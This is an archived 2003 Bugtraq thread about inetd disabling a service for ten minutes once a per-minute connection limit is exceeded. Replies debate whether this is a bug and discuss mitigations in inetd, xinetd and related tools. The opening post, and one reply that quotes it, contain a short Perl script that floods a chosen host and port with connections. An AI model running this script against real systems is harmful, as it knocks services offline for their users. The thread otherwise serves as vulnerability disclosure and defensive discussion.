10648677 2003-09-06 18:08 +0400 /87 rader/ 3APA3A <3APA3A@SECURITY.NNOV.RU>
Importerad: 2003-09-06 23:41 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Externa svar till: 3APA3A@SECURITY.NNOV.RU
Mottagare: Bugtraq (import) <28850>
Ärende: 11 years of inetd default insecurity?
------------------------------------------------------------
From: 3APA3A <3APA3A@SECURITY.NNOV.RU>
To: bugtraq@securityfocus.com
Message-ID: <434148437.20030906180822@SECURITY.NNOV.RU>
Dear bugtraq@securityfocus.com,
Well, we all blame Microsoft in insecure default
configuration... Isn't it time to clean outdated code in Unix?
I. Intro
Saint_Byte reported DoS vulnerability in wu-ftp. Small perl script (like
one below) kills ftp service... With closer look we have good old inetd
feature a lot of existing FreeBSD/linux installations are still
vulnerable. This problem is known since ancient time [1] and was
discussed again and again, but still present. In fact, problem is well
known. It's just another rake everyone steps to. It's on any man and
FAQ, but may be it's time to resolve it? Because it's definitely a BUG.
II. Who is vulnerable
Any system shipped with network daemons launched through inetd
(FreeBSD, SuSE, Red Hat, etc.).
III. Details
Inetd has an option
-R rate
Specify the maximum number of times a service can be invoked in
one minute; the default is 256. A rate of 0 allows an unlimited
number of invocations.
The problem is, remote attacker can establish as much connections per
minute as bandwidth allows... Now, guess how inetd reacts if more than
256 connections received in one minute? It will disable service for next
10 minutes to help attack to succeed. Of cause, this is documented.
Interval is not configurable.
something like
Jul 23 15:27:10 host inetd[86]: ftp/tcp server failing (looping),
service terminated
will appear in logs... If connection is closed by attacker
before service actually starts, IP address of attacker will never be
logged.
IV. Workaround
-R 0 -s your_ad_can_be_here
or ask everyone to do not bother your server.
V. inetd-DoS-by-default-11-years-anniversary-super-exploit.pl
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
#!/usr/bin/perl
use Socket;
$host=@ARGV[0];
$port=@ARGV[1];
if ($host eq "" || $port eq "") {print "\n Usage progname HOST PORT \n";}
$iadr=inet_aton($host);
$padr=sockaddr_in($port,$iadr);
for($i=0; $i < 300; $i++)
{
socket(SOCK,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
connect(SOCK,$padr) or next;
close(SOCK);
}
print "\nDone\n";
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
VI. References:
[1]Ari Luotonen, "www/tcp server failing (looping), service
terminated"
http://www.webhistory.org/www.lists/www-talk.1993q4/0312.html
--
http://www.security.nnov.ru
/\_/\
{ , . } |\
+--oQQo->{ ^ }<-----+ \
| ZARAZA U 3APA3A }
+-------------o66o--+ /
|/
You know my name - look up my number (The Beatles)
(10648677) /3APA3A <3APA3A@SECURITY.NNOV.RU>/(Ombruten)
Kommentar i text 10657367 av Thamer Al-Harbash <tmh@whitefang.com>
Kommentar i text 10657450 av Dagmar d'Surreal <dagmar.wants@nospam.com>
Kommentar i text 10658540 av Mike Tancsa <mike@sentex.net>
Kommentar i text 10663307 av Dan Harkless <bugtraq@harkless.org>
Kommentar i text 10663553 av Darren Pilgrim <dmp@bitfreak.org>
10657367 2003-09-07 21:46 -0400 /26 rader/ Thamer Al-Harbash <tmh@whitefang.com>
Importerad: 2003-09-08 19:59 av Brevbäraren
Extern mottagare: 3APA3A <3APA3A@SECURITY.NNOV.RU>
Extern kopiemottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <28859>
Kommentar till text 10648677 av 3APA3A <3APA3A@SECURITY.NNOV.RU>
Ärende: Re: 11 years of inetd default insecurity?
------------------------------------------------------------
From: Thamer Al-Harbash <tmh@whitefang.com>
To: 3APA3A <3APA3A@SECURITY.NNOV.RU>
Cc: bugtraq@securityfocus.com
Message-ID: <Pine.BSF.4.51.0309072145220.54030@helena.whitefang.com>
On Sat, 6 Sep 2003, 3APA3A wrote:
> Dear bugtraq@securityfocus.com,
>
> Well, we all blame Microsoft in insecure default configuration... Isn't
> it time to clean outdated code in Unix?
This has been a known problem for quite a while. In fact
D. J. Bernstein already solved it with tcpserver:
http://cr.yp.to/ucspi-tcp.html
If you look at the bottom he points out pretty much what you
pointed out.
--
Thamer Al-Harbash
GPG Key fingerprint: D7F3 1E3B F329 8DD5 FAE3 03B1 A663 E359 D686 AA1F
"HLAGHLHALUAG (KTHANX)"
(10657367) /Thamer Al-Harbash <tmh@whitefang.com>/--
Kommentar i text 10658800 av Dan Stromberg <strombrg@dcs.nac.uci.edu>
10658800 2003-09-08 12:44 -0700 /33 rader/ Dan Stromberg <strombrg@dcs.nac.uci.edu>
Importerad: 2003-09-09 00:52 av Brevbäraren
Extern mottagare: Thamer Al-Harbash <tmh@whitefang.com>
Extern kopiemottagare: Dan Stromberg <strombrg@dcs.nac.uci.edu>
Extern kopiemottagare: 3APA3A <3APA3A@SECURITY.NNOV.RU>
Extern kopiemottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <28882>
Kommentar till text 10657367 av Thamer Al-Harbash <tmh@whitefang.com>
Ärende: Re: 11 years of inetd default insecurity?
------------------------------------------------------------
From: Dan Stromberg <strombrg@dcs.nac.uci.edu>
To: Thamer Al-Harbash <tmh@whitefang.com>
Cc: Dan Stromberg <strombrg@dcs.nac.uci.edu>,
3APA3A <3APA3A@SECURITY.NNOV.RU>, bugtraq@securityfocus.com
Message-ID: <1063050294.23431.154.camel@tesuji.nac.uci.edu>
On Sun, 2003-09-07 at 18:46, Thamer Al-Harbash wrote:
> On Sat, 6 Sep 2003, 3APA3A wrote:
>
> > Dear bugtraq@securityfocus.com,
> >
> > Well, we all blame Microsoft in insecure default configuration... Isn't
> > it time to clean outdated code in Unix?
>
> This has been a known problem for quite a while. In fact
> D. J. Bernstein already solved it with tcpserver:
>
> http://cr.yp.to/ucspi-tcp.html
>
> If you look at the bottom he points out pretty much what you
> pointed out.
So DJB's program basically has a large listen queue, and goes into
queue-only mode after 40 concurrent connections?
If that's the case, then there's still a DOS - just fill the listen
queue with so much stuff that connections aren't serviced for a long
time.
--
Dan Stromberg DCS/NACS/UCI <strombrg@dcs.nac.uci.edu>
(10658800) /Dan Stromberg <strombrg@dcs.nac.uci.edu>/
Bilaga (application/pgp-signature) i text 10658801
Kommentar i text 10669784 av Andres Kroonmaa <andre@online.ee>
10658801 2003-09-08 12:44 -0700 /8 rader/ Dan Stromberg <strombrg@dcs.nac.uci.edu>
Bilagans filnamn: "signature.asc"
Importerad: 2003-09-09 00:52 av Brevbäraren
Extern mottagare: Thamer Al-Harbash <tmh@whitefang.com>
Extern kopiemottagare: Dan Stromberg <strombrg@dcs.nac.uci.edu>
Extern kopiemottagare: 3APA3A <3APA3A@SECURITY.NNOV.RU>
Extern kopiemottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <28883>
Bilaga (application/pgp-signature) till text 10658800
Ärende: Bilaga (signature.asc) till: Re: 11 years of inetd default insecurity?
------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)
iD8DBQA/XNw2o0feVm00f/8RApQTAJ0eBWm22bEzvvK0OygACceOpBKvCgCeP6Qa
z2hCaNNB5pVHl6lluQ5QH9g=
=S27F
-----END PGP SIGNATURE-----
(10658801) /Dan Stromberg <strombrg@dcs.nac.uci.edu>/
10669784 2003-09-10 09:40 +0300 /37 rader/ Andres Kroonmaa <andre@online.ee>
Importerad: 2003-09-10 22:37 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <28936>
Kommentar till text 10658800 av Dan Stromberg <strombrg@dcs.nac.uci.edu>
Ärende: Re: 11 years of inetd default insecurity?
------------------------------------------------------------
From: "Andres Kroonmaa" <andre@online.ee>
To: bugtraq@securityfocus.com
Message-ID: <3F5EF185.26987.22C7C6C6@localhost>
On 8 Sep 2003, at 12:44, Dan Stromberg <strombrg@dcs.nac.uci.edu>
wrote:
> So DJB's program basically has a large listen queue, and goes into
> queue-only mode after 40 concurrent connections?
>
> If that's the case, then there's still a DOS - just fill the listen
> queue with so much stuff that connections aren't serviced for a long
> time.
I wonder how many years it takes for people to realise that DOS
based on service flooding is not something you can be immune
to. Does it really take one DDOS per person to realise this simple
truth? For every single method you invent there are 10 other methods
to smash your box into nirvana anyway.
Purpose of inetd was never security, nor protection of box from
stupid applications it is called to start that can consume all
resources. Inetd fulfills its purpose. If you need more, you need
something else.
If you want security separation, use state-tracking firewall. If you
want to be immune from DOS, unplug from internet. All else is
pointless whining. Imagining that inetd should evolve into strong
firewall is as bizarre as it can get.
------------------------------------
Andres Kroonmaa <andre@online.ee>
CTO, Microlink Data AS
Tel: 6501 731, Fax: 6501 725
Pärnu mnt. 158, Tallinn
11317 Estonia
(10669784) /Andres Kroonmaa <andre@online.ee>/(Ombruten)
10657450 2003-09-07 16:59 -0500 /115 rader/ Dagmar d'Surreal <dagmar.wants@nospam.com>
Importerad: 2003-09-08 20:19 av Brevbäraren
Extern mottagare: 3APA3A <3APA3A@SECURITY.NNOV.RU>
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <28863>
Kommentar till text 10648677 av 3APA3A <3APA3A@SECURITY.NNOV.RU>
Ärende: Re: 11 years of inetd default insecurity?
------------------------------------------------------------
From: Dagmar d'Surreal <dagmar.wants@nospam.com>
To: 3APA3A <3APA3A@SECURITY.NNOV.RU>, bugtraq@securityfocus.com
Message-ID: <1062971991.411.31.camel@lanshark.kung.foo>
On Sat, 2003-09-06 at 09:08, 3APA3A wrote:
> Dear bugtraq@securityfocus.com,
>
> Well, we all blame Microsoft in insecure default configuration... Isn't
> it time to clean outdated code in Unix?
>
> I. Intro
>
> Saint_Byte reported DoS vulnerability in wu-ftp. Small perl script (like
> one below) kills ftp service... With closer look we have good old inetd
> feature a lot of existing FreeBSD/linux installations are still
> vulnerable. This problem is known since ancient time [1] and was
> discussed again and again, but still present. In fact, problem is well
> known. It's just another rake everyone steps to. It's on any man and
> FAQ, but may be it's time to resolve it? Because it's definitely a BUG.
This is not a bug, it is merely very coarse resource control. You
have two choices... Allow only a certain number of connections to
the port, or allow an *infinite* number of connections to the port.
I don't know about your systems, but mine tend to get a little boggy
when processing an infinite number of connection requests.
> II. Who is vulnerable
>
> Any system shipped with network daemons launched through inetd (FreeBSD,
> SuSE, Red Hat, etc.).
>
> III. Details
>
> Inetd has an option
>
> -R rate
> Specify the maximum number of times a service can be invoked in
> one minute; the default is 256. A rate of 0 allows an unlimited
> number of invocations.
>
> The problem is, remote attacker can establish as much connections per
> minute as bandwidth allows... Now, guess how inetd reacts if more than
> 256 connections received in one minute? It will disable service for next
> 10 minutes to help attack to succeed. Of cause, this is documented.
> Interval is not configurable.
No, you miss the point. The service is disabled to prevent it from
eating you out of house and home so to speak. In any case, this only
restricts the number of connections per minute... total number of
connections over several minutes is another matter entirely.
> something like
>
> Jul 23 15:27:10 host inetd[86]: ftp/tcp server failing (looping), service terminated
>
> will appear in logs... If connection is closed by attacker before
> service actually starts, IP address of attacker will never be logged.
Yep. More stuff that has entirely to do with how one's stack works
and very little to do with inetd. Send a packet with both SYN and
FIN set and you get this exact behaviour... little doughnut shaped
memory structures with a hole in the middle from the
already-disposed-of socket where the IP address should be.
> IV. Workaround
>
> -R 0 -s your_ad_can_be_here
I see... So you feel it's better to simply dare an attacker to try to
invoke three hundred bajillion copies of say, fingerd. How novel. I
can only hope the majority on the list realize why following your
suggestion is very bad.
Most people prefer to simply not use inetd for anything that is
supposed to withstand an assault, or to use xinetd instead because of
it's improved ability to limit the connections... er... be easily
DoS'd.
> or ask everyone to do not bother your server.
>
> V. inetd-DoS-by-default-11-years-anniversary-super-exploit.pl
> -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
> #!/usr/bin/perl
>
> use Socket;
> $host=@ARGV[0];
> $port=@ARGV[1];
> if ($host eq "" || $port eq "") {print "\n Usage progname HOST PORT \n";}
> $iadr=inet_aton($host);
> $padr=sockaddr_in($port,$iadr);
> for($i=0; $i < 300; $i++)
> {
> socket(SOCK,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
> connect(SOCK,$padr) or next;
> close(SOCK);
> }
> print "\nDone\n";
> -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Octopus, something you surely should have heard about by now.
http://24.234.57.173/p3/octopus.c
> VI. References:
>
> [1]Ari Luotonen, "www/tcp server failing (looping), service terminated"
> http://www.webhistory.org/www.lists/www-talk.1993q4/0312.html
References:
Google web search engine, "Good for avoiding embarrasment"
http://www.google.com
-- The email address above is just as phony as it looks, and for
obvious reasons. Instant messaging contact nfo: AIM: evilDagmar
Jabber: evilDagmar@jabber.org
(10657450) /Dagmar d'Surreal <dagmar.wants@nospam.com>/(Ombruten)
Kommentar i text 10663780 av Mike Hoskins <mike@adept.org>
10663780 2003-09-08 15:46 -0700 /48 rader/ Mike Hoskins <mike@adept.org>
Importerad: 2003-09-09 21:41 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <28905>
Kommentar till text 10657450 av Dagmar d'Surreal <dagmar.wants@nospam.com>
Ärende: Re: 11 years of inetd default insecurity?
------------------------------------------------------------
From: Mike Hoskins <mike@adept.org>
To: bugtraq@securityfocus.com
Message-ID: <20030908153736.M64137@fubar.adept.org>
On Sun, 7 Sep 2003, Dagmar d'Surreal wrote:
> I see... So you feel it's better to simply dare an attacker to try to
> invoke three hundred bajillion copies of say, fingerd. How novel. I
> can only hope the majority on the list realize why following your
> suggestion is very bad.
luckily, i think anyone that actually reads the entire man page would
understand that. ;) from FreeBSD's inetd(8),
"
-c maximum
Specify the default maximum number of simultaneous invocations of
each service; the default is unlimited. May be overridden on a
per-service basis with the "max-child" parameter.
-C rate
Specify the default maximum number of times a service can be
invoked from a single IP address in one minute; the default is
unlimited. May be overridden on a per-service basis with the
"max-connections-per-ip-per-minute" parameter.
-R rate
Specify the maximum number of times a service can be invoked in
one minute; the default is 256. A rate of 0 allows an unlimited
number of invocations.
-s maximum
Specify the default maximum number of simultaneous invocations of
each service from a single IP address; the default is unlimited.
May be overridden on a per-service basis with the "max-child-per-
ip" parameter.
"
so there are much better ways to address the problem in modern
inetds. also, OS' i use make installing inetd at all optional.
furthermore, many Linux' i'm familiar with make xinetd the default...
so this is anything but 'default insecurity'.
-mrh
--
From: "Spam Catcher" <spam-catcher@adept.org>
To: spam-catcher@adept.org
Do NOT send email to the address listed above or
you will be added to a blacklist!
(10663780) /Mike Hoskins <mike@adept.org>/(Ombruten)
10658540 2003-09-08 13:50 -0400 /45 rader/ Mike Tancsa <mike@sentex.net>
Importerad: 2003-09-08 23:36 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Extern kopiemottagare: 3APA3A@SECURITY.NNOV.RU
Mottagare: Bugtraq (import) <28874>
Kommentar till text 10648677 av 3APA3A <3APA3A@SECURITY.NNOV.RU>
Ärende: Re: 11 years of inetd default insecurity?
------------------------------------------------------------
From: Mike Tancsa <mike@sentex.net>
To: bugtraq@securityfocus.com
Cc: 3APA3A@SECURITY.NNOV.RU
Message-ID: <5.2.0.9.0.20030908134545.06dd9dd8@209.112.4.2>
At 06:08 PM 06/09/2003 +0400, 3APA3A wrote:
>The problem is, remote attacker can establish as much connections per
>minute as bandwidth allows... Now, guess how inetd reacts if more than
>256 connections received in one minute? It will disable service for next
>10 minutes to help attack to succeed. Of cause, this is documented.
>Interval is not configurable.
>
>something like
>
>Jul 23 15:27:10 host inetd[86]: ftp/tcp server failing (looping), service
>terminated
>
>will appear in logs... If connection is closed by attacker before
>service actually starts, IP address of attacker will never be logged.
>
>IV. Workaround
Hi, On FreeBSD's inetd there is the -C option in conjunction with the
-R option
-C rate
Specify the default maximum number of times a service can be
invoked from a single IP address in one minute; the default is
unlimited. May be overridden on a per-service basis with the
"max-connections-per-ip-per-minute" parameter.
-R rate
Specify the maximum number of times a service can be invoked in
one minute; the default is 256. A rate of 0 allows an unlimited
number of invocations.
You can run without either of these options, but then you risk a DoS
from resource starvation. e.g. invoke 1000 copies of ftpd and eat
up all the RAM/Swap etc. Its problematic either way, but at least
you can mitigate the effects somewhat if its a single host attacking.
---Mike
(10658540) /Mike Tancsa <mike@sentex.net>/(Ombruten)
Kommentar i text 10668780 av Jonathan A. Zdziarski <jonathan@nuclearelephant.com>
10668780 2003-09-09 10:07 -0400 /27 rader/ Jonathan A. Zdziarski <jonathan@nuclearelephant.com>
Importerad: 2003-09-10 19:12 av Brevbäraren
Extern mottagare: Mike Tancsa <mike@sentex.net>
Extern kopiemottagare: bugtraq@securityfocus.com
Extern kopiemottagare: 3APA3A@SECURITY.NNOV.RU
Extern kopiemottagare: strombrg@dcs.nac.uci.edu
Mottagare: Bugtraq (import) <28915>
Kommentar till text 10658540 av Mike Tancsa <mike@sentex.net>
Ärende: Re: 11 years of inetd default insecurity?
------------------------------------------------------------
From: "Jonathan A. Zdziarski" <jonathan@nuclearelephant.com>
To: Mike Tancsa <mike@sentex.net>
Cc: bugtraq@securityfocus.com, 3APA3A@SECURITY.NNOV.RU,
strombrg@dcs.nac.uci.edu
Message-ID: <1063116428.3334.7.camel@tantor.nuclearelephant.com>
I wonder how difficult it would be to port the Apache DOS Evasive
Maneuvers module to an inetd implementation. It does an excellent
job of both fending off Dos/DDoS/Brute Force attacks and it also will
talk to other tools on the network (Firewall, Router) to push the
attack back to the borders.
I would love a stab at doing this, but does anyone know where the
original inetd source tree could be found? You could theoretically do
this to the wrappers instead, but with consequences...so it makes more
sense to code it right into the inetd listener.
For reference the Apache DOS Evasive Maneuvers Module can be found at
http://www.nuclearelephant.com/projects/dosevasive/
The advantage to doing it this way is that nothing goes into 'queue'
mode, and nothing shuts down...you're cutting off the flooding host
(or hosts) and nobody else. It would be all too easy to detect an
inetd flood.
(10668780) /Jonathan A. Zdziarski <jonathan@nuclearelephant.com>/(Ombruten)
Kommentar i text 10670507 av Greg A. Woods <woods@weird.com>
10670507 2003-09-10 14:47 -0400 /47 rader/ Greg A. Woods <woods@weird.com>
Importerad: 2003-09-11 02:32 av Brevbäraren
Extern mottagare: Jonathan A. Zdziarski <jonathan@nuclearelephant.com>
Extern kopiemottagare: Mike Tancsa <mike@sentex.net>
Extern kopiemottagare: bugtraq@securityfocus.com
Extern kopiemottagare: 3APA3A@SECURITY.NNOV.RU
Extern kopiemottagare: strombrg@dcs.nac.uci.edu
Externa svar till: woods@planix.com
Mottagare: Bugtraq (import) <28955>
Kommentar till text 10668780 av Jonathan A. Zdziarski <jonathan@nuclearelephant.com>
Ärende: Re: 11 years of inetd default insecurity?
------------------------------------------------------------
From: "Greg A. Woods" <woods@weird.com>
To: "Jonathan A. Zdziarski" <jonathan@nuclearelephant.com>
Cc: Mike Tancsa <mike@sentex.net>, bugtraq@securityfocus.com,
3APA3A@SECURITY.NNOV.RU, strombrg@dcs.nac.uci.edu
Message-ID: <m19x9zl-000B1VC@proven.weird.com>
[ On Tuesday, September 9, 2003 at 10:07:08 (-0400), Jonathan A. Zdziarski wrote: ]
> Subject: Re: 11 years of inetd default insecurity?
>
> I would love a stab at doing this, but does anyone know where the
> original inetd source tree could be found?
You don't want to start with the "original". Really.
You could start with my version. I've integrated the best features of
FreeBSD and OpenBSD into one derived the NetBSD version.
See NetBSD's PR#18955. Let me know if you want the very latest
source from my local 1.6.x-STABLE tree (I should append it to the PR
soon though).
http://www.netbsd.org/cgi-bin/query-pr-single.pl?number=18955
> For reference the Apache DOS Evasive Maneuvers Module can be found at
> http://www.nuclearelephant.com/projects/dosevasive/
>
> The advantage to doing it this way is that nothing goes into 'queue'
> mode, and nothing shuts down...you're cutting off the flooding host (or
> hosts) and nobody else.
I will certainly take a look at the mechanisms implemented for Apache.
Thanks for posting this reference!
> It would be all too easy to detect an inetd
> flood.
Fending off D.D.o.S. attacks that make normal service requests of
public servers while still maintaining usable services is anything
but easy. :-)
--
Greg A. Woods
+1 416 218-0098 VE3TCP RoboHack <woods@robohack.ca>
Planix, Inc. <woods@planix.com> Secrets of the Weird <woods@weird.com>
(10670507) /Greg A. Woods <woods@weird.com>/(Ombruten)
10663307 2003-09-08 16:24 -0700 /66 rader/ Dan Harkless <bugtraq@harkless.org>
Importerad: 2003-09-09 19:42 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <28893>
Kommentar till text 10648677 av 3APA3A <3APA3A@SECURITY.NNOV.RU>
Ärende: Re: 11 years of inetd default insecurity?
------------------------------------------------------------
From: Dan Harkless <bugtraq@harkless.org>
To: bugtraq@securityfocus.com
Message-ID: <200309082324.h88NOdgY009192@www.harkless.org>
On September 6, 2003, 3APA3A <3APA3A@SECURITY.NNOV.RU> wrote:
> II. Who is vulnerable
>
> Any system shipped with network daemons launched through inetd (FreeBSD,
> SuSE, Red Hat, etc.).
^^^^ ^^^ ^^^
On September 8, 2003, 3APA3A <3APA3A@SECURITY.NNOV.RU> wrote:
> IMHO reasonable behavior is limiting a number of requests accepted per
> second without disabling service. But this code became a kind of saint
> cow. Only hope is young monsters like xinetd will rid this dinosaur off
> as a result of evolution.
Recent versions of Red Hat and SuSE default to installing xinetd, not
inetd. xinetd offers this commandline option:
-limit proc_limit
This option places a limit on the number of concurrently running
processes that can be started by xinetd. Its purpose is to pre-
vent process table overflows.
and the following xinetd.conf options:
instances determines the number of servers that can be simulta-
neously active for a service (the default is no
limit). The value of this attribute can be either a
number or UNLIMITED which means that there is no
limit.
per_source Takes an integer or "UNLIMITED" as an argument. This
specifies the maximum instances of this service per
source IP address. This can also be specified in the
defaults section.
cps Limits the rate of incoming connections. Takes two
arguments. The first argument is the number of con-
nections per second to handle. If the rate of incom-
ing connections is higher than this, the service will
be temporarily disabled. The second argument is the
number of seconds to wait before re-enabling the ser-
vice after it has been disabled. The default for this
setting is 50 incoming connections and the interval is
10 seconds.
max_load Takes a floating point value as the load at which the
service will stop accepting connections. For example:
2 or 2.5. The service will stop accepting connections
at this load. This is the one minute load average.
This is an OS dependent feature, and currently only
Linux, Solaris, and FreeBSD are supported for this.
This feature is only avaliable if xinetd was config-
ured with the -with-loadavg option.
plus per-service rlimit_{as,cpu,data,rss,stack}.
--
Dan Harkless
bugtraq@harkless.org
http://harkless.org/dan/
(10663307) /Dan Harkless <bugtraq@harkless.org>/----
10663553 2003-09-09 10:17 -0700 /42 rader/ Darren Pilgrim <dmp@bitfreak.org>
Importerad: 2003-09-09 20:50 av Brevbäraren
Extern mottagare: 3APA3A <3APA3A@SECURITY.NNOV.RU>
Extern kopiemottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <28900>
Kommentar till text 10648677 av 3APA3A <3APA3A@SECURITY.NNOV.RU>
Ärende: Re: 11 years of inetd default insecurity?
------------------------------------------------------------
From: Darren Pilgrim <dmp@bitfreak.org>
To: 3APA3A <3APA3A@SECURITY.NNOV.RU>
Cc: bugtraq@securityfocus.com
Message-ID: <20030909101712.302e5f9e.dmp@bitfreak.org>
On 2003.09.06 18:08:22 +0400, 3APA3A <3APA3A@SECURITY.NNOV.RU> wrote:
> II. Who is vulnerable
>
> Any system shipped with network daemons launched through inetd
> (FreeBSD, SuSE, Red Hat, etc.).
FreeBSD doesn't run anything through inetd by default. You have to
manually edit inetd.conf to enable anything, and there is a warning
screen during the install process about doing so.
Additionally, FreeBSD's stock inetd has the following options:
-c maximum
Specify the default maximum number of simultaneous
invocations of each service; the default is unlimited.
May be overridden on a per-service basis with the
"max-child" parameter.
-C rate
Specify the default maximum number of times a service can
be invoked from a single IP address in one minute; the
default is unlimited. May be overridden on a per-service
basis with the "max-connections-per-ip-per-minute"
parameter.
-R rate
Specify the maximum number of times a service can be
invoked in one minute; the default is 256. A rate of 0
allows an unlimited number of invocations.
-s maximum
Specify the default maximum number of simultaneous
invocations of each service from a single IP address; the
default is unlimited. May be overridden on a per-service
basis with the "max-child-per-ip" parameter.
(10663553) /Darren Pilgrim <dmp@bitfreak.org>/------
10657423 2003-09-08 14:07 +0400 /27 rader/ 3APA3A <3APA3A@SECURITY.NNOV.RU>
Importerad: 2003-09-08 20:14 av Brevbäraren
Extern mottagare: Paul Szabo <psz@maths.usyd.edu.au>
Extern kopiemottagare: bugtraq@securityfocus.com
Externa svar till: 3APA3A@SECURITY.NNOV.RU
Mottagare: Bugtraq (import) <28862>
Kommentar till text 10657826 av Paul Szabo <psz@maths.usyd.edu.au>
Sänt: 2003-09-08 21:18
Ärende: Re[2]: 11 years of inetd default insecurity?
------------------------------------------------------------
From: 3APA3A <3APA3A@SECURITY.NNOV.RU>
To: psz@maths.usyd.edu.au (Paul Szabo)
Cc: bugtraq@securityfocus.com
Message-ID: <391241550.20030908140700@SECURITY.NNOV.RU>
Dear Paul Szabo,
--Monday, September 8, 2003, 4:26:24 AM, you wrote to
3APA3A@SECURITY.NNOV.RU:
>> -R 0 -s your_ad_can_be_here
PS> Your cure is worse than the disease: rate limiting allows a
DoS PS> against the service, no limit allows a DoS against
the whole PS> machine.
-s limits number of processes invoked from same IP. You can
additionally use -c to prevent distributed attack. It doesn't
allow to DoS box and doesn't disable service for 10 minutes.
--
~/ZARAZA
Íó à òåïåðü, Óèëüÿì, õîðîøåíüêî ïîðàçìûñëèòå íàä äàííûì ïèñüìîì. (Òâåí)
(10657423) /3APA3A <3APA3A@SECURITY.NNOV.RU>/(Ombruten)
10657826 2003-09-08 10:26 +1000 /30 rader/ Paul Szabo <psz@maths.usyd.edu.au>
Importerad: 2003-09-08 21:18 av Brevbäraren
Extern mottagare: 3APA3A@SECURITY.NNOV.RU
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <28867>
Ärende: Re: 11 years of inetd default insecurity?
------------------------------------------------------------
From: psz@maths.usyd.edu.au (Paul Szabo)
To: 3APA3A@SECURITY.NNOV.RU, bugtraq@securityfocus.com
Message-ID: <200309080026.h880QOc114306@milan.maths.usyd.edu.au>
3APA3A <3APA3A@SECURITY.NNOV.RU> wrote:
> III. Details
>
> Inetd has an option
> -R rate ... default is 256 ...
> ... if more than 256 connections received in one minute [inetd] will
> disable service for next 10 minutes ...
> ... IP address of attacker will never be logged.
>
> IV. Workaround
>
> -R 0 -s your_ad_can_be_here
I guess you are trying to say that xinetd is more configurable than
inetd. Yes, it is known that with inetd you need tcp_wrappers to log
attack IPs.
Your cure is worse than the disease: rate limiting allows a DoS
against the service, no limit allows a DoS against the whole machine.
Cheers,
Paul Szabo - psz@maths.usyd.edu.au http://www.maths.usyd.edu.au:8000/u/psz/
School of Mathematics and Statistics University of Sydney 2006 Australia
(10657826) /Paul Szabo <psz@maths.usyd.edu.au>/(Ombruten)
Kommentar i text 10657423 av 3APA3A <3APA3A@SECURITY.NNOV.RU>
Kommentar i text 10658590 av Lucas Holt <luke@foolishgames.com>
10658590 2003-09-08 16:51 -0400 /42 rader/ Lucas Holt <luke@foolishgames.com>
Importerad: 2003-09-08 23:50 av Brevbäraren
Extern mottagare: Paul Szabo <psz@maths.usyd.edu.au>
Extern kopiemottagare: 3APA3A@SECURITY.NNOV.RU
Extern kopiemottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <28875>
Kommentar till text 10657826 av Paul Szabo <psz@maths.usyd.edu.au>
Ärende: Re: 11 years of inetd default insecurity?
------------------------------------------------------------
From: Lucas Holt <luke@foolishgames.com>
To: psz@maths.usyd.edu.au (Paul Szabo)
Cc: 3APA3A@SECURITY.NNOV.RU, bugtraq@securityfocus.com
Message-ID: <2EA9C34C-E23E-11D7-BB51-0030656DD690@foolishgames.com>
>
>
> Your cure is worse than the disease: rate limiting allows a DoS
> against the
> service, no limit allows a DoS against the whole machine.
>
> Cheers,
>
> Paul Szabo - psz@maths.usyd.edu.au
> http://www.maths.usyd.edu.au:8000/u/psz/
> School of Mathematics and Statistics University of Sydney 2006
> Australia
>
Isn't that the point of system administration, to set reasonable
values for such things. A balance between a reasonable load and a
full DOS attack on the service or machine must be achieved.
I don't see how this feature is bad as long as its used properly.
Besides many people run multiple services on a host.. if you set the
value to unlimited all services are DOS'd. For instance, I have a
system running apache, sendmail, and imapd. imapd is spawned by inetd
and therefore could be DOS'd with a limit. By setting a limit though,
my apache and sendmail servers stay up. I think this is a no brainer.
Lucas Holt
Luke@FoolishGames.com
________________________________________________________
FoolishGames.com (Jewel Fan Site)
JustJournal.com (Free blogging)
"Only two things are infinite, the universe and human stupidity, and
I'm not sure about the former."
- Albert Einstein (1879-1955)
(10658590) /Lucas Holt <luke@foolishgames.com>/(Ombruten)
10658134 2003-09-09 05:11 +1000 /27 rader/ Paul Szabo <psz@maths.usyd.edu.au>
Importerad: 2003-09-08 22:11 av Brevbäraren
Extern mottagare: 3APA3A@SECURITY.NNOV.RU
Extern kopiemottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <28871>
Ärende: Re: Re[2]: 11 years of inetd default insecurity?
------------------------------------------------------------
From: psz@maths.usyd.edu.au (Paul Szabo)
To: 3APA3A@SECURITY.NNOV.RU
Cc: bugtraq@securityfocus.com
Message-ID: <200309081911.h88JBCY201696@milan.maths.usyd.edu.au>
3APA3A <3APA3A@SECURITY.NNOV.RU> wrote:
>>> -R 0 -s your_ad_can_be_here
>
>> Your cure is worse than the disease: rate limiting allows a DoS
>> against the service, no limit allows a DoS against the whole
>> machine.
>
> -s limits number of processes invoked from same IP. You can additionally
> use -c to prevent distributed attack. It doesn't allow to DoS box and
> doesn't disable service for 10 minutes.
Note that my (DEC/Compaq/HP Tru64) inetd does not have -c or -s
options. The only safe way is to use a sensible -R and
tcp_wrappers. Or upgrade to Linux and xinetd...
Cheers,
Paul Szabo - psz@maths.usyd.edu.au http://www.maths.usyd.edu.au:8000/u/psz/
School of Mathematics and Statistics University of Sydney 2006 Australia
(10658134) /Paul Szabo <psz@maths.usyd.edu.au>/(Ombruten)
